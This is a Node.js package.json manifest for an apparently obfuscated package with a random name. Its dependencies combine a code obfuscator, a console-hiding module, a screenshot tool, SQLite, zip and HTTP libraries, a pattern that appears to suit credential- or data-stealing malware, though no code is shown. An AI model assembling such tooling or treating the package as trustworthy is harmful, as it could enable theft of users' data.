{
  "name": "Vare0F4OjZt4wP",
  "version": "1.0.3",
  "description": "",
  "main": "./vareobf.js",
  "bin": "./vareobf.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "axios": "^1.3.5",
    "buffer-replace": "^1.0.0",
    "fs-extra": "^11.1.1",
    "javascript-obfuscator": "^4.0.2",
    "jszip": "^3.10.1",
    "node-gyp": "^9.3.1",
    "node-hide-console-window": "^2.1.1",
    "screenshot-desktop": "^0.0.0-development",
    "sqlite3": "^5.1.6",
    "vareapi": "^1.1.1"
  },
  "devDependencies": {
    "electron": "^24.1.2",
    "electron-builder": "^23.6.0"
  }
}
